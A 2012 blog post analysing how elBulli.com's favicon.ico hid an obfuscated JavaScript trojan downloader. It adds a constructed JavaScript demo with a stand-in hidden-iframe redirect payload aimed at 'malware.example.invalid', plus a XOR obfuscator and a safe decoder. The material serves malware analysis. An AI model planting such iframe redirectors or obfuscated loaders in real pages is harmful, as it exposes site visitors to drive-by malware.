elBulli.com infected with a Trojan

Posted on Mon 30 January 2012 in reversing

elBulli.com, the website of the world's most famous restaurant, once run by the iconic chef Ferran Adrià and now closed, appears to have been compromised by an unknown party. As of 22:50 (CET+1) on Jan 30th the site elBulli.com is welcoming its visitors with an unpleasant surprise.

The site serves a trojan downloader through an obfuscated script hidden inside its favicon.ico file. What follows is an analysis session dissecting what that script does and how.

UPDATE: At 8:40 CET+1 (Jan 31st) the malware was removed from the site and the entry point used by the attackers was found and patched, as reported by the sysadmins. It is once again safe to visit elBulli.com.

I was first tipped off by @jamon_y_vino, entrepreneurial foodtivist who, while doing some research, got a beautiful warning from Avast! antivirus. After the initial sadness on her face for not being able to visit the site, and my incredible excitement at having the opportunity to analyze the malware first hand, I took a screenshot of the red warning thrown by Avast!

elbulli.com infection

Avast! classifies it as a JavaScript redirector: it sends the visitor of the infected site to another site, from which arbitrary files are downloaded, such as the trojan itself or whatever else the attacker has prepared.

Let's take a look at the problematic file.

After downloading www.elbulli.com/favicon.ico with cURL I fired up Notepad++ and found an obfuscated <script> block instead of icon data. That made me hungry, so I put a pizza in the oven before commencing reverse engineering on the file.

I will not paste the code here, only screen captures of sections of it. After the usual filler statements that disguise the malicious code, the payload is decoded with the familiar String.fromCharCode() + eval() JavaScript pattern.

deobfuscating favicon.ico

The loop going from lines 27 to 35 decodes the payload and the final eval() runs it. To see what this is hiding, we simply remove the eval() and replace it with some form of printout, so the decoded text is shown rather than executed. That gives us this:

iframer code

And that's where we hit the target of the malware. It is reaching out to a very suspicious URL; in fact the Google Safe Browsing diagnostic page reports the domain as suspicious, known for having hosted malware in the last 90 days. A whois of the domain shows .ru name servers handling it, which doesn't make me feel very comfortable.
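The two analysis steps above, decoding the fromCharCode() blob with eval() swapped for a harmless sink and then pulling the redirect target out of the decoded text for a Safe Browsing or whois lookup, as an added example. This is not the favicon.ico code from the post: the payload, the XOR-with-key encoding, the key `k3y` and the `malware.example.invalid` host are all constructed stand-ins for the demonstration.

```javascript
// Added example, not code from elBulli.com's favicon.ico. Everything below is
// constructed: the iframe payload, the encoding scheme and the key.

// Stand-in for the hidden "iframer" payload. The target host is a reserved
// example name, not the real redirect URL found in the sample.
const HIDDEN_PAYLOAD =
  "document.write('<iframe src=\"http://malware.example.invalid/stat.php\" " +
  "width=\"1\" height=\"1\" style=\"visibility:hidden\"></iframe>');";

// Obfuscate the way many droppers do: XOR every char code against a short
// key and emit the numbers as a comma-separated list. (Constructed scheme.)
function obfuscate(src, key) {
  const out = [];
  for (let i = 0; i < src.length; i++) {
    out.push(src.charCodeAt(i) ^ key.charCodeAt(i % key.length));
  }
  return out.join(',');
}

// The decode loop as it sits in a dropper: rebuild the text one char code at
// a time with String.fromCharCode(), then hand the result to `sink`.
// In the malware the sink is eval(); the analyst passes something else.
function decodeAndFeed(blob, key, sink) {
  const nums = blob.split(',');
  let s = '';
  for (let i = 0; i < nums.length; i++) {
    s += String.fromCharCode(parseInt(nums[i], 10) ^ key.charCodeAt(i % key.length));
  }
  return sink(s);
}

// The analyst's sink: capture the decoded text, execute nothing.
const capture = (s) => s;

// What the dropper does is decodeAndFeed(blob, key, eval). Never do that on a
// live sample; swap eval() for the capturing sink and read the payload instead.
function deobfuscate(blob, key) {
  return decodeAndFeed(blob, key, capture);
}

// Pull every src="..." URL out of the decoded payload so the redirect target
// can be checked (Safe Browsing, whois) without ever loading it in a browser.
function extractUrls(decoded) {
  const re = /src\s*=\s*["']([^"']+)["']/gi;
  const urls = [];
  let m;
  while ((m = re.exec(decoded)) !== null) urls.push(m[1]);
  return urls;
}

// Demo run: encode the constructed payload, then recover and inspect it.
const KEY = 'k3y';
const BLOB = obfuscate(HIDDEN_PAYLOAD, KEY);
const DECODED = deobfuscate(BLOB, KEY);
console.log(DECODED);
console.log(extractUrls(DECODED));
```

The point of passing the sink as a parameter is that the only line that changes between the attacker's version and the analyst's is the last argument; the decode loop itself is left exactly as found, so there is no risk of "fixing" the decoder into producing something the sample never contained.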

Further study of what that stat.php page returns promises to be very interesting, but the priority here is to report the compromise and let the web admins deal with it.

The verdict from virustotal.com on the infected favicon.ico is not surprising: [15 out of 37 engines flag it](https://www.virustotal.com/file/6b7cbf6153644e11ca1caaaf632f8a0850b378cefe1dbd99d18af0955ffef41a/analysis/1327957385/).

~~I will update this post with news about the threat.~~ See update on top.